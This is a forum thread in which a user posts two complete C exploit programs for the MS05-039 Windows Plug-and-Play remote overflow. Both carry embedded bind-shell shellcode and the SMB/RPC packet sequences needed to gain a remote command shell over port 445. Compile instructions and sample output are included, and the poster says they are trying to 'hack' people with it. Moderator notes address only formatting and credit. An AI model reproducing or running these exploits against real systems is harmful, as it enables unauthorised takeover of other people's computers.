Jump to content
xisto Community
Sign in to follow this  
Followers 0
st4r-s4t

Microsoft Windows Plug-and-play Service Remote Ove

By st4r-s4t, in Security issues & Exploits

Recommended Posts

st4r-s4t    0

st4r-s4t
Posted (edited)

This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ...

/*Windows 2000 universal exploit for MS05-039-\x6d\x35\x6c\x30\x6e\x6e\x79-*/#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winnetwk.h>#include <winsock.h>#include <Rpc.h>#include <wchar.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")BYTE Data1[0x68] ={0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00, 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00, 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00, 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};struct DataStruct1{       BYTE SomeString[0x30];       DWORD RESDataType;       DWORD LFD;       DWORD SDM1;       DWORD SDO;       DWORD SDL;       DWORD SDM2;       BYTE  SDA[0x07D0];       DWORD LRD;       DWORD MB;       DWORD DM;};struct RPCBIND{       BYTE VerMaj;       BYTE VerMin;       BYTE PacketType;       BYTE PacketFlags;       DWORD DataRep;       WORD FragLength;       WORD AuthLength;       DWORD CallID;       WORD MaxXmitFrag;       WORD MaxRecvFrag;       DWORD AssocGroup;       BYTE NumCtxItems;       WORD ContextID;       WORD NumTransItems;       GUID InterfaceUUID;       WORD InterfaceVerMaj;       WORD InterfaceVerMin;       GUID TransferSyntax;       DWORD SyntaxVer;};//from metasploit, before you were bornBYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c""\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32""\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07""\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24""\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8""\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64""\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e""\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53""\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4""\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9""\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d""\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51""\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54""\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff""\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a""\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55""\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c""\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10""\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff""\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3""\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55""\x04\x31\xdb\x53\xff\xd0"};BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};struct RPCFUNC{       BYTE VerMaj;       BYTE VerMin;       BYTE PacketType;       BYTE PacketFlags;       DWORD DataRep;       WORD FragLength;       WORD AuthLength;       DWORD CallID;       DWORD AllocHint;       WORD ContextID;       WORD Opnum;};BYTE POP[0x27] ={0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00, 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 0x05,0x08,0x00,0x00,0x41,0x00,0x41};int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){       BYTE rbuf[0x1000];       DWORD dw;       struct RPCBIND RPCBind;       memcpy(&RPCBind,&PRPC,sizeof(RPCBind));       UuidFromString(Interface,&RPCBind.InterfaceUUID);       UuidToString(&RPCBind.InterfaceUUID,&Interface);       RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);       RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);       TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);       return 0;}int Attack(HANDLE PipeHandle){       struct RPCFUNC RPCOP;       int bwritten=0;       BYTE *LargeBuffer;       BYTE rbuf[0x100];       DWORD dw;       struct DataStruct1 EvilRPC;       memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));       EvilRPC.SDL=0x07C0;       memset(EvilRPC.SDA,0x90,0x07D0);       EvilRPC.SDA[76]=0x3e;       EvilRPC.SDA[77]=0x1e;       EvilRPC.SDA[78]=0x02;       EvilRPC.SDA[79]=0x75;       memset(EvilRPC.SDA+80,0x90,10);       EvilRPC.SDA[90]=0x90;       memcpy(EvilRPC.SDA+94,BindShell,374);       EvilRPC.MB=0x00000004;       EvilRPC.DM=0x00000000;       EvilRPC.LFD=0x000007E0;       EvilRPC.LRD=0x000007E0;       memcpy(&RPCOP,&POP,sizeof(RPCOP));       RPCOP.Opnum = 54;       RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);       RPCOP.AllocHint=sizeof(EvilRPC);       LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));       memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));       memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));       memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));       printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721");       TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);       free(LargeBuffer);       return 0;}int main(int argc, char* argv[]){       char *server;       NETRESOURCE nr;       char unc[MAX_PATH];       char szPipe[MAX_PATH];       HANDLE hFile;       if (argc < 2)       {               printf("Usage: %s <host>\n", argv[0]);               return 1;       }       server=argv[1];       _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);       unc[sizeof(unc)-1] = 0;       nr.dwType       = RESOURCETYPE_ANY;       nr.lpLocalName  = NULL;       nr.lpRemoteName = unc;       nr.lpProvider   = NULL;       WNetAddConnection2(&nr, "", "", 0);       _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);       BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");       //SendMalformed RPC request       Attack(hFile);       return 0;}

Notice from snlildude87:
Credits adjusted.Remember to preview posts before posting to avoid something like this in the future
Notice from cmatcmextra:
[-codebox-] tags used instead. Should shorten the page size up ... a bit -_-
Edited by cmatcmextra (see edit history)

Share this post

Link to post
Share on other sites

eXtreme    0

eXtreme
Posted

Errr... really what do you mean with this topic??Please explain better, i can only see some bunch of OS code, and the subject talking about " Microsoft Windows Plug-and-play Service Remote Ove"

Share this post

Link to post
Share on other sites

st4r-s4t    0

st4r-s4t
Posted (edited)

oh ok i am sory this is the new vuln of plug and play it`s name is:

MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)

* Description:

*    A remote code execution and local elevation of privilege

*    vulnerability exists in Plug and Play that could allow an

*    attacker who successfully exploited this vulnerability to take

*    complete control of the affected system.

*

*    This is a remote code execution and local privilege elevation

*    vulnerability. On Windows 2000, an anonymous attacker could

*    remotely try to exploit this vulnerability.

*

*    On Windows XP Service Pack 1, only an authenticated user could

*    remotely try to exploit this vulnerability.

*    On Window XP Service Pack 2 and Windows Server 2003, only an

*    administrator can remotely access the affected component.

*    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,

*    this is strictly a local privilege elevation vulnerability.

*    An anonymous user cannot remotely attempt to exploit this

*    vulnerability on Windows XP Service Pack 2 and Windows

*    Server 2003.

this is the other vuln of the plug and play ... and i compile it with lcc-win32 and it attack to port 445/tcp but until now i can`t hack any person with it:

other vuln of plug and play:

/* #define _WIN32 */#include <stdio.h>#include <stdlib.h>#include <string.h>#ifdef _WIN32#include <winsock2.h>#pragma comment(lib, "ws2_32")#else#include <sys/types.h>#include <netinet/in.h>#include <sys/socket.h>#include <netdb.h>#endifunsigned char SMB_Negotiate[] =	"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"	"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"	"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"	"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"	"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"	"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"	"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";unsigned char SMB_SessionSetupAndX[] =	"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"	"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"	"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"	"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"	"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"	"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"	"\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_SessionSetupAndX2[] =	"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"	"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"	"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"	"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"	"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"	"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"	"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"	"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"	"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"	"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"	"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"	"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_TreeConnectAndX[] =	"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";unsigned char SMB_TreeConnectAndX_[] =	"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";/* browser */unsigned char SMB_PipeRequest_browser[] =	"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"	"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"	"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"	"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";unsigned char SMB_PNPEndpoint[] =/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */	"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"	"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"	"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"	"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"	"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"	"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";unsigned char RPC_call[] =	"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"	"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"	"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"	"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"	"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"	"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"	"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	/* jmp over - entry point */	"\xEB\x08\x90\x90"	/* pop reg; pop reg; retn; - umpnpmgr.dll */	"\x67\x15\x7a\x76" /* 0x767a1567 */	/* jmp ebx - umpnpmgr.dll	"\x6f\x36\x7a\x76" */	"\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";unsigned char RPC_call_end[] =	"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";unsigned char bind_shellcode[] =	"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"	"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"	"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"	"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"	"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"	"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"	"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"	"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"	"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"	"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"	"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"	"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"	"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"	"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"	"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"	"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"	"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"	"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"	"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"	"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"	"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"	"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";#define SET_PORTBIND_PORT(buf, port) \	*(unsigned short *)(((buf)+186)) = (port)voidconvert_name(char *out, char *name){	unsigned long len;	len = strlen(name);	out += len * 2 - 1;	while (len--) {  *out-- = '\x00';  *out-- = name[len];	}}intmain (int argc, char **argv){	struct sockaddr_in addr;	struct hostent *he;	int len;	int sockfd;	unsigned short smblen;	unsigned short bindport;	unsigned char tmp[1024];	unsigned char packet[4096];	unsigned char *ptr;	char recvbuf[4096];#ifdef _WIN32	WSADATA wsa;	WSAStartup(MAKEWORD(2,0), &wsa);#endif	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");	printf("\t         Universal Exploit + no crash shellcode\n\n\n");	printf("\t            Copyright © 2005 .: houseofdabus :.\n\n\n");	if (argc < 3) {  printf("%s <host> <bind port>\n", argv[0]);  exit(0);	}	if ((he = gethostbyname(argv[1])) == NULL) {  printf("[-] Unable to resolve %s\n", argv[1]);  exit(0);	}	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  printf("[-] socket failed\n");  exit(0);	}	addr.sin_family = AF_INET;	addr.sin_port = htons(445);	addr.sin_addr = *((struct in_addr *)he->h_addr);	memset(&(addr.sin_zero), '\0', 8);	printf("\n[*] connecting to %s:445...", argv[1]);	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {  printf("\n[-] connect failed\n");  exit(0);	}	printf("ok\n");	printf("[*] null session...");	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if (len <= 10) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	ptr = packet;	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);	ptr += sizeof(SMB_TreeConnectAndX)-1;	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);	convert_name(ptr, tmp);	smblen = strlen(tmp)*2;	ptr += smblen;	smblen += 9;	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);	ptr += sizeof(SMB_TreeConnectAndX_)-1;	smblen = ptr-packet;	smblen -= 4;	memcpy(packet+3, &smblen, 1);	if (send(sockfd, packet, ptr-packet, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	printf("ok\n");	printf("[*] bind pipe...");	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	printf("ok\n");	printf("[*] sending crafted packet...");	// nop	ptr = packet;	memset(packet, '\x90', sizeof(packet));	// header & offsets	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);	ptr += sizeof(RPC_call)-1;	// shellcode	bindport = (unsigned short)atoi(argv[2]);	bindport ^= 0x0437;	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);	// end of packet	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,  RPC_call_end,  sizeof(RPC_call_end)-1);	// sending...	if (send(sockfd, packet, 2196, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	printf("ok\n");	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));	recv(sockfd, recvbuf, 4096, 0);return 0;}

 

and some info about it:

* ---------------------------------------------------------------------

* Solution:

*    http://www.microsoft.com/err/technet/security/

*

* ---------------------------------------------------------------------

* Systems Affected:

*    - Windows Server 2003, SP1

*    - Windows XP SP1, SP2

*    - Windows 2000 SP4

*

* ---------------------------------------------------------------------

* Tested on:

*    - Windows 2000 SP4

*

* ---------------------------------------------------------------------

* Compile:

*

* Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

* Linux      : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

*

* ---------------------------------------------------------------------

* Example:

*

* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777

*

* [*] connecting to 192.168.0.22:445...ok

* [*] null session...ok

* [*] bind pipe...ok

* [*] sending crafted packet...ok

* [*] check your shell on 192.168.0.1:7777

* Ctrl+C

*

* C:\>nc 192.168.0.1 7777

*

* Microsoft Windows 2000 [Version 5.00.2195]

* © Copyright 1985-2000 Microsoft Corp.

*

* C:\WINNT\system32>

*

* ---------------------------------------------------------------------.

I Sorry because i`m iranian and ican`t speak English very good!!

 

I HOPE FOR ...

by

 

Notice from BuffaloHELP:
Whenever you copy and paste from another souce you must place QUOTE tags. Source http://imp.ovh.net/fr/ Credit adjusted.

Notice from Klass:
User warned as verbal warn was given prior. Also next time you post Long Code use 
[codebox] [/codebox]
tags
Edited by Klass (see edit history)

Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  
Followers 0
Go To Topic Listing
×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

  I accept